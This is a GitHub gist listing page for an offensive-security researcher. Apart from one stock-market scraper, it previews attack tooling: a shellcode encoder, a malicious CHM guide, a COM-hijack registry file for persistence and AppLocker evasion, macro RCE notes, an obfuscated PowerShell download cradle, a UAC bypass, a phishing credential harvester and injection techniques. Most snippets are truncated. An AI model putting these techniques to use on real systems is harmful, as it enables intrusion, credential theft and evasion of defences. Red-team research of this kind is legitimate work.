Skip to content

Instantly share code, notes, and snippets.

View mgeeky's full-sized avatar
💭
Wanna sip a sencha?

Mariusz Banach mgeeky

💭
Wanna sip a sencha?
2.3k followers · 95 following
  • Binary-Offensive.com
  • Poland
  • X @mariuszbit
View GitHub Profile
@mgeeky
mgeeky / collect-gpw.py
Last active February 22, 2024 21:44
Script that collects data from GPW (Warsaw Stock Exchange) and corellates it with stock details retrieved from Money.pl quotes. As the result two CSV files will be generated - one with full results, and second with results filtered by B. Graham conditions.
#!/usr/bin/python
#
# Skrypt pobierajacy obecne wskazniki spolek ze strony GPW,
# po czym dla kazdej spolki wczytujacy parametry jej notowan i akcji
# ze strony Money.pl. Rezultatem dzialania sa dwa pliki CSV gotowe do zaimportowania
# i obrobienia w Excelu. Pierwszy plik - out.csv zawiera wszystkie dane spolek, drugi
# csv_filtered zawiera dane odfiltrowane po restrykcyjnych kryteriach Benjamina Grahama,
# autora Inteligentnego Inwestora.
#
@mgeeky
mgeeky / ascii-shellcode-encoder.py
Last active February 10, 2024 20:50
ASCII Shellcode encoder for Exploit Development purposes, utilizing Jon Erickson's substract arguments finding algorithm.
#!/usr/bin/python
#
# Shellcode to ASCII encoder leveraging rebuilding on-the-stack technique,
# and using Jon Erickson's algorithm from Phiral Research Labs `Dissembler`
# utility (as described in: Hacking - The Art of Exploitation).
#
# Basically one gives to the program's output a binary encoded shellcode,
# and it yields on the output it's ASCII encoded form.
#
# This payload will at the beginning align the stack by firstly moving
@mgeeky
mgeeky / Malicious-CHM-Guide.md
Created February 6, 2018 13:52
CheatSheet describing how to create malicious CHM file by hand (another approach is to use Nishang's Out-Chm scriptlet).

Procedure for generating Malicious CHM file

  • Step 0: Download and install Microsoft HTML Help Workshop and Documentation
  • Step 1: Obtain a valid CHM file and unpack it using 7-zip
  • Step 2: Find an entry-point HTML file within "docs" directory and insert the following code into it's <body> section:
<OBJECT id=x classid="clsid:adb880a6-d8ff-11cf-9377-00aa003b7a11" width=1 height=1>
@mgeeky
mgeeky / slmgr-com-hijack.reg
Last active January 24, 2024 16:19
Example presenting how to Hijack COM object named "Scripting.Dictionary" used by slmgr.vbs (CreateObject("Scripting.Dictionary")) in order to obtain persistence or evade Command Line logging and AppLocker
Windows Registry Editor Version 5.00
[HKEY_CURRENT_USER\Software\Classes\Scripting.Dictionary]
@=""
[HKEY_CURRENT_USER\Software\Classes\Scripting.Dictionary]
@="{00000001-0000-0000-0000-0000FEEDACDC}"
[HKEY_CURRENT_USER\Software\Classes\CLSID\{00000001-0000-0000-0000-0000FEEDACDC}]
@="Scripting.Dictionary"
@mgeeky
mgeeky / Various-Macro-Based-RCEs.md
Last active January 14, 2024 16:43
Various Visual Basic Macros-based Remote Code Execution techniques to get your meterpreter invoked on the infected machine.

This is a note for myself describing various Visual Basic macros construction strategies that could be used for remote code execution via malicious Document vector. Nothing new or fancy here, just a list of techniques, tools and scripts collected in one place for a quick glimpse of an eye before setting a payload.

All of the below examples had been generated for using as a remote address: 192.168.56.101.

List:

  1. Page substiution macro for luring user to click Enable Content
  2. The Unicorn Powershell based payload
@mgeeky
mgeeky / Download-Cradles-Oneliners.md
Last active January 8, 2024 14:06
Various Powershell Download Cradles purposed as one-liners

Download Cradles

0) Extra goodies

  • Obfuscated FromBase64String with -bxor nice for dynamic strings deobfuscation:
$t=([type]('{1}{0}'-f'vert','Con'));($t::(($t.GetMethods()|?{$_.Name-clike'F*g'}).Name).Invoke('Yk9CA05CA0hMV0I=')|%{$_-bxor35}|%{[char]$_})-join''
  • The same as above but for UTF-16 base64 encoded strings:
@mgeeky
mgeeky / uac-silentcleanupbypass.ps1
Created May 12, 2021 01:09
UAC Bypass: SilentCleanup (Win10 1903+). Leaves powershell.exe running with nasty command line: (powershell -w hidden -c "& 'C:\your\evil\command.exe'";#\system32\werfault.exe)
function UAC-SilentCleanupBypass {
param(
[Parameter(Mandatory = $True)]
[String]$Command
)
$assemblies=(
"System"
)
@mgeeky
mgeeky / post.php
Last active December 27, 2023 07:40
(GIST discontinued, for recent version check: https://github.com/mgeeky/PhishingPost ) PHP Credentials Harversting script to be used during Social Engineering Phishing campaigns/projects.
<?php
/*
* PHP Script intdended to be used during Phishing attempts as a harverster
* collector linked to backdoored HTML <form> action parameter. Such action
* parameter could be set like this:
*
* <form [...] action="/post.php" [...]>
*
* and script named as 'post.php' to get it working. Additional further configurations
* can be made in the section below.
@mgeeky
mgeeky / _notes.md
Created June 6, 2023 21:09 — forked from djhohnstein/_notes.md
AppDomainManager Injection

Let's turn Any .NET Application into an LOL Bin

We can do this by experimenting with .config files.

Many defenders catch/detect files that are renamed, they do this by matching Original Filename to Process Name

In this example, we don't have to rename anything. We simple coerce a trusted signed app to load our Assembly.

We do this by directing the application to read a config file we provide.

@mgeeky
mgeeky / Source.cpp
Created May 9, 2023 22:12 — forked from alfarom256/Source.cpp
Thread Execution via NtCreateWorkerFactory
#include <Windows.h>
#include <winternl.h>
#include <stdio.h>
#define WORKER_FACTORY_FULL_ACCESS 0xf00ff
// https://github.com/winsiderss/systeminformer/blob/17fb2e0048f062a04394c4ccd615b611e6ffd45d/phnt/include/ntexapi.h#LL1096C1-L1115C52
typedef enum _WORKERFACTORYINFOCLASS
{
WorkerFactoryTimeout, // LARGE_INTEGER